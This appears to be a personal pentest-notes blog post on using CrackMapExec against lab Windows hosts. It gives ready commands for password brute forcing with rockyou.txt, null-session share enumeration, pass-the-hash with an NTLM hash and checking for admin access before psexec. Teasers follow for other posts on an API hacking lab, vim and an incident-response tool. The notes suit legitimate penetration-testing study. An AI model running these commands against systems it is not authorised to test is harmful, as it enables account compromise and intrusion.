Skip to main content

crackmapexec or cme | pass pol

crackmapexec smb 10.6.0.2 -u 'SAccount' -p /usr/share/wordlists/rockyou.txt

This does the same job as hydra but this tool is more faster than hydra. 

you can use crackmapexec or cme interchangeably.

installation of crackmapexec:

https://github.com/byt3bl33d3r/CrackMapExec

sudo python3 -m pip install pipx

sudo pipx ensurepath or pipx ensurepath 

sudo apt-get install python3-venv

pipx install crackmapexec 

once it is installed now type cme -h




you can also enumerate shares using cme - crackmapexec. smbclient will not tell you whether you have read or write access on the share folder or not. crackmapexec will tell you that. smbmap will also tell you that. 

lets see how we can enumerate shares using cme:

cme smb 10.10.10.192

or

cme smb 10.10.10.192 --shares

or

cme smb 10.10.10.192 --shares -u ''  (using two single quote separately)

or

cme smb 10.10.10.192 --shares -u '' -p ''  (using two single quote separately)

or

cme smb 10.10.10.192 --shares -u 'PleaseSub'

or cme smb 10.10.10.192 --shares -u 'PleaseSub' -p ''   (this worked actually, see the above ss) 


 

The above image shows another way to access shares using cme when you have username and password known. when you have special character in your password, put password in between the single or double quotes. 


we can also send hash while using crackmapexec:

cme smb 10.10.10.192 -u svc_backup -H <ntlm hash for example>  (if you dont get any failed message then run the below command as well to see pwned or not. 

cme winrm smb 10.10.10.192 -u svc_backup -H <ntlm hash for example>


to see you able to get a remote shell on a remote box:

if you see pwn3d comes as the result then you can launch evil-winrm

crackmapexec  winrm 10.10.10.192 -u NAccount -p H4cky21



before using psexec use crackmapexec to see pwn3d comes or not in the result. when you see pwn3d then you may assume that you can do psexec

crackmapexec smb 10.10.10.192 -u administrator -H 184fb5e5178480be64824d4cd53b99ee

if pwn3d comes then use psexec to pass this administrator hash to the remote box. 

 

using crackmapexec to check account lockout policy:

crackmapexec smb 10.10.10.161 --pass-pol 

or 

crackmapexec smb 10.10.10.161 --pass-pol -u ' ' -p ' '   

(null authentication works for AD that are upgraded from 2003. latest install does not let you do this) if you see this working put it on your pentest report. latest windows requires credentials.

if we see account lockout threshold is 0 then we can safely brute force.

 

we can also use crackmapexec to brute force smb:

crackmapexec smb 10.10.10.161 -u userlist.out -p pwlist.txt 


 

Avi 

Comments

Post a Comment

Popular posts from this blog

API hacking lab setup

 Follow the commands to install and configure API hacking lab: 1. Install kali linux and update all the packages.  apt update -y apt upgrade -y or apt dist-upgrade -y or apt full-upgrade -y If you face any problem regarding update, install cloud flare warp in the host machine, then again start updating packages in your kali vm.  2. Install and configure burpsuite professional.  After that open burpsuite and go to Extensions tab. Click on BAppStore. Search for Autorize extension, It will help us to automate authorization testing. Click on Download Jython from the right side. From Jython website click on Jython standalone JAR and save it. Go to Extensios > Extensions settings >  under Core extension settings find out Python environment on the right pane. Select the jython jar file that you just downloaded. Now again go to BAppStore and re-search for Autorize extension. You will see Install option this time after selecting Autorize extension. Install it. You ...
Post a Comment
Read more

How to use vim efficiently

  Here every command works in command mode . And if you need to write something then you need to go to Insert mode . Pressing i will take you to the insert mode.  1. Let's say you want to search something. For example you want to find avi keyword. Then first you need to go to the command mode by typing Esc . Now type /avi  (at the bottom) and hit enter. Press small n to forward this search pattern and press Shift N to go reverse.  2. Substitute something: :%s/old string/new string/g    (g for affecting globally) 3. If you want to pick the 1st letter of word then press w and last letter of word then press e .  4. yy means copy a single line. 2yy means copy double lines.  5. Shift P is for paste.  6. Shift D to delete a line or cut a line.  7. Press o to go a new line.  8. Press Home to go to the 1st letter of a line and End to go to the last letter of a line.  9. If you want to save the file then press wq! . 10. If ...
Post a Comment
Read more

Installing kansa incident response tool

 Kansa is an IR framework. https://github.com/davehull/Kansa For enterprise data collection, you need to do this first from the admin system: Set-NetConnectionProfile -NetworkCategory Private (In private network) Enable-PSRemoting  from powershell on the system where you want to run this tool. This will enable winrm service with port 5985 and 5986. Check: netstat -naob | findstr "5985"   Also allow tcp port 5985 and 5986 for winrm through the network. You can use  GPO. Though winrm is communicating over http and https but authentication will be happened using kerberos in domain environment.  After downloading it  from the github and unzip it, you need to unlock it using powershell. Need powershell v3 or later. ls -r *.ps1 | Unblock-File Powershell policy bypass: Set-ExecutionPolicy AllSigned | RemoteSigned | Unrestricted From FOR508 course: .\kansa.ps1 -OutputPath .\Output\ -TargetList .\hostlist -TargetCount 250 -Verbose -Pushbin -Pushbin is requir...
Post a Comment
Read more